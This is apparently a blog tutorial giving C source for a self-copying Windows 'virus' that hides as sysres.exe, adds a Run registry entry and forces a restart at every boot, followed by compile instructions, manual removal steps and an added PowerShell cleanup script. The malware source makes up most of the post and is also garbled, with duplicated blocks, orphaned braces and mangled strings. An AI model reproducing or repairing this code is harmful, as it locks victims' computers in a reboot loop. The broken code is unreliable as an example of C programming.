I suppose everyone who uses a computer has come across the term virus, but have you ever wondered about creating one?
In this post I will tell you how to create a virus in C that restarts the computer on startup.
You need to compile the code given below in a C compiler and make it your own.
Source Code in C:
#include<stdio.h>
#include<dos.h>
#include<dir.h>
#include<dos.h>
#include<dir.h>
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\windows\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\windows\system\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\windows\system\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\windows\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\windows\system\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\windows\system\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\windows\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\windows\system\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\windows\system\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
C:\windows\system\ sysres.exe”); //put this file to registry for starup
break;
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\windows\system\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
C:\windows\system\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
D:\windows\system\sysres.exe”);
break;
target=fopen(“D:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
D:\windows\system\sysres.exe”);
break;
case 3:
target=fopen(“E:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
E:\windows\system\sysres.exe”);
break;
target=fopen(“E:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
E:\windows\system\sysres.exe”);
break;
case 4:
target=fopen(“F:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
F:\windows\system\sysres.exe”);
break;
target=fopen(“F:\windows\system\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run /v sres /t REG_SZ /d
F:\windows\system\sysres.exe”);
break;
default:
exit(0);
}
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0?); //if the system is already infected then just give a command to restart
}
system(“shutdown -r -t 0?); //if the system is already infected then just give a command to restart
}
__________________________________________________________________
Compiling The Source Code Into Executable Virus.
1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For a step-by-step compilation guide, refer to my post How to compile C Programs.
Testing And Removing The Virus From Your PC
You can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. From then on, every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.
1. Reboot your computer in Safe Mode.
2. Go to X:\Windows\System (X can be C, D, E or F).
3. You will find a file named sysres.exe; delete it.
4. Type regedit in Run to open the Registry Editor. There, navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
There, on the right side, you will see an entry named "sres". Delete this entry. That's it. You have removed this virus successfully.
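The removal steps above can also be checked with a script. The following PowerShell is an added example, not part of the original post: it reports the two artifacts the post names (the "sres" value under the per-user Run key and sysres.exe in X:\Windows\System) and deletes them only when asked. It assumes it runs in the affected user's session with rights to delete from the Windows directory; the `-Remove` switch and the variable names are this example's own.

```powershell
# Added example: audit (and optionally clean) the artifacts described in this post.
# Assumption: run as the affected user, because the entry lives under HKEY_CURRENT_USER.
param([switch]$Remove)   # hypothetical switch: without it the script only reports

$runKey    = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$valueName = 'sres'
$fileName  = 'sysres.exe'
$findings  = @()

# 1. Startup entry: the value "sres" under the per-user Run key.
$entry = Get-ItemProperty -Path $runKey -Name $valueName -ErrorAction SilentlyContinue
if ($entry) {
    $findings += [pscustomobject]@{
        Type     = 'RunValue'
        Location = "$runKey\$valueName"
        Detail   = $entry.$valueName        # the command line that runs at logon
    }
    if ($Remove) { Remove-ItemProperty -Path $runKey -Name $valueName }
}

# 2. Dropped copy: X:\Windows\System\sysres.exe for X in C, D, E, F.
foreach ($drive in 'C', 'D', 'E', 'F') {
    $path = "${drive}:\Windows\System\$fileName"
    if (Test-Path -LiteralPath $path -PathType Leaf) {
        # Record a hash before deleting so the finding can be referenced later.
        $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        $findings += [pscustomobject]@{
            Type     = 'File'
            Location = $path
            Detail   = "SHA256 $hash"
        }
        if ($Remove) { Remove-Item -LiteralPath $path -Force }
    }
}

if ($findings.Count -eq 0) {
    'No sysres.exe file or sres Run value found.'
} else {
    $findings | Format-Table -AutoSize
}
```

Run it from Safe Mode as in step 1, where Run-key entries are not launched at logon, so the restart loop does not interrupt the cleanup.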
Logic Behind The Working Of The Virus
If I don't explain the logic (algorithm) behind the working of the virus, this post will be incomplete. So I'll explain the logic in a simplified manner. Here I'll not explain the technical details of the program. If you have further doubts, please leave a comment.
LOGIC:
1. First the virus will find the root partition (the partition on which Windows is installed).
2. Next it will determine whether the virus file is already copied (already infected) into X:\Windows\System.
3. If not, it will just place a copy of itself into X:\Windows\System and make a registry entry to put this virus file onto the startup.
4. Or else, if the virus is already found in the X:\Windows\System directory (folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.